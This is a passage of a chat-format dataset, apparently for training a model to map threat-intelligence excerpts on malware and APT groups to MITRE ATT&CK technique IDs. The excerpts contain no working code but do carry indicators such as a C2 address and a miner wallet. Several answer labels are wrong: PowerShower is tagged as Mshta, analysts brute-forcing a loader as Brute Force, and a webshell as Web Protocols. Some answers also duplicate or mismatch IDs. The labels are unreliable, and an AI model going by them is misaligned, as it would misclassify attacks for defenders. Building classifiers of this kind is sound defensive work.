- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage"
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates. In December 2019, GOLD SOUTHFIELD began operating a name-and-shame style website that uses stolen data from intrusions to generate additional leverage against victims; a tactic known as double extortion. Despite GOLD SOUTHFIELD's infrastructure being taken down by law enforcement in October 2021, the REvil leak site re-emerged in April 2022 with several new victims added. GOLD SOUTHFIELD also began recruiting exclusively via their leak site using the peer-to-peer secure messaging software Tox Chat. GOLD SOUTHFIELD's affiliates distribute ransomware through a variety of means including exploit kits, scan-and-exploit attacks, publicly-accessible RDP, remote management and monitoring (RMM) servers, and backdoored software installers. As of May 2022, the group continues to operate REvil as a name-and-shame scheme and uses a leak site to post victim information and recruit affiliates"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOWDRIFT collects and sends system information to its C2."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command."
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1053.003 - Scheduled Task/Job: Cron', 'T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This introduction of string obfuscation also suggests a development change aimed at evading detection. The header codes, filename references, and all of the operator commands were obfuscated and only decoded during execution of the KeyBoy DLL. Figure 6 shows a sampling of these strings, after decoding"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE UNION uses various tools for credential theft. In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download files onto the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 content with XOR using a single byte, 0x12."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can collect network and active connection information."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A FinFisher variant uses a custom packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA459 has a VBScript for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations, preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used to remove artifacts from victims."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used Windows command shell commands to detect and avoid virtualization and analysis environments."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can identify the domain membership of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Patchwork payload was packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can establish persistence by adding a Registry run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To establish persistence, Okrum can install itself as a new service named NtmSsvc."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can use Native API including \"CreateProcess\" \"GetProcessById\", and \"WriteProcessMemory\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has downloaded second stage malware from compromised websites."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can download additional files from its C2 via HTTP or DNS."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic compresses the collected data with bzip2 before sending it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to discover current NetBIOS sessions."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Business info at outsidersecurity.nl . Introducing ROADtools - The Azure AD exploration framework . 15 minute read . Over the past 1.5 years I’ve been doing quite a lot of exploration into Azure AD and how it works under the hood. So I set myself a few goals: - Provide tooling for both Red teams and Blue teams to explore all Azure AD data in an accessible way. Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database. Where to get the data . Since Azure AD is a cloud service, there isn’t a way to reverse engineer how it works, or a central repository where all the data is stored that you can access. While researching Azure and looking through the requests in the Azure Portal, at some point I noticed that the portal was calling a different version of the Azure AD Graph, the 1.61-internal version. This internal version of the Azure AD graph exposes much more data than any of the official API’s that are offered by Microsoft. To create the object structure, ROADrecon uses the OData metadata definition that the Azure AD graph exposes. ROADrecon will by default pretend to be the Azure AD PowerShell module and will thus inherit its permissions to access the internal version of the Azure AD graph. Gathering all the data . The second step is data gathering, which the roadrecon gather command does. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Enumerates remote open SMB network shares"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The username appears to be attacker specified and has occurred in 2017 Bankshot samples"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has collected files from victim machines, including certificates and cookies."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC"
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SUPERNOVA webshell is an anonymous code C# webshell written in .NET C# that is specifically written for usage on SolarWinds Orion servers"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit', 'T1574.006 - Hijack Execution Flow: LD_PRELOAD"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP as a transport to communicate with its command server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4: Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment', 'T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike’s web server, and presents a one-liner to download and run the artifact"
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These privilege escalation modules are the ones we caught when we queried for Jian’s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird deletes its payload along with the payload's parent process after it finishes copying files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During our initial research into the TwoFace++ loader, we were unable to extract the embedded payload using the same brute forcing technique that we used on the initial TwoFace loader samples"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can detect the username of the infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR)."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has modified the permissions on binaries with \"chattr\"."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Probably full and active window screenshot quality captureActiveQC 40 CaptureSites VPN*0,0 Login*0,0 mail*0,0 Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook important upLog.txt upSCRLog.txt upSpecial.txt upFile.txt upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2 Servers http://108.61.189.174 Control server HTTP URL ZipPass KtJvOXulgibfiHk Password for uploaded zip archives browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread Most of the parameters are self-explanatory"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can utilize command line options to allow an attacker control over how it scans and encrypts files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mapping of TG-3390's interactions with web shells during an intrusion responded to by CTU researchers"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT was distributed via malicious Word documents."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
